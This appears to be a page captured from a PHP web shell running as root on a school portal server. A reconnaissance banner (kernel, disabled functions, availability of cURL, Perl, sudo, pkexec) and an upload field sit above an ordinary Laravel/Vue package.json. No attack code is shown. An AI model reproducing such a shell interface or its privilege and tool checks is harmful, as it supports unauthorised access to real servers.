Server IP : / Your IP : 10.244.4.16 [ Web Server : nginx/1.25.3 System : Linux escuela-portal-app-54f56585bc-kst6g 5.15.0-1084-azure #93-Ubuntu SMP Sat Mar 15 14:12:29 UTC 2025 x86_64 User : root ( 0) PHP Version : 8.2.13 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals, Domains : 0 Domains MySQL : OFF | cURL : ON | WGET : OFF | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/app/ |
Upload File : |
{ "private": true, "scripts": { "dev": "npm run development", "development": "mix", "watch": "mix watch", "watch-poll": "mix watch -- --watch-options-poll=1000", "hot": "mix watch --hot", "prod": "npm run production", "production": "mix --production" }, "devDependencies": { "@angular/cli": "^12.0.4", "@mathieustan/vue-datepicker": "^0.2.11", "@mdi/font": "^5.9.55", "axios": "^0.21", "case-sensitive-paths-webpack-plugin": "^2.4.0", "deepmerge": "^4.2.2", "laravel-mix": "^6.0.49", "lodash": "^4.17.19", "postcss": "^8.4.31", "resolve-url-loader": "^4.0.0", "sass": "^1.32.13", "sass-loader": "^13.3.2", "vue-loader": "^15.9.7", "vue-template-compiler": "^2.7.14", "webpack": "^5.88.2" }, "dependencies": { "@desislavsd/vue-select": "^0.5.2", "@fortawesome/fontawesome-free": "^5.15.3", "blob": "^0.1.0", "bootstrap": "^5.2.3", "bootstrap-vue": "^2.23.1", "chart.js": "^2.9.4", "html2canvas": "^1.3.2", "jspdf": "^2.3.1", "material-design-icons-iconfont": "^6.7.0", "moment": "^2.29.4", "survey-vue": "^1.9.110", "survey-vue-ui": "^1.9.110", "surveyjs-widgets": "^1.9.110", "sweetalert2": "^11.0.11", "vue": "^2.7.14", "vue-chartjs": "^3.5.1", "vue-data-tables": "^3.4.5", "vue-datatables-net": "^1.5.2", "vue-html2canvas": "0.0.4", "vue-router": "^3.5.1", "vuetify": "^2.7.1" } }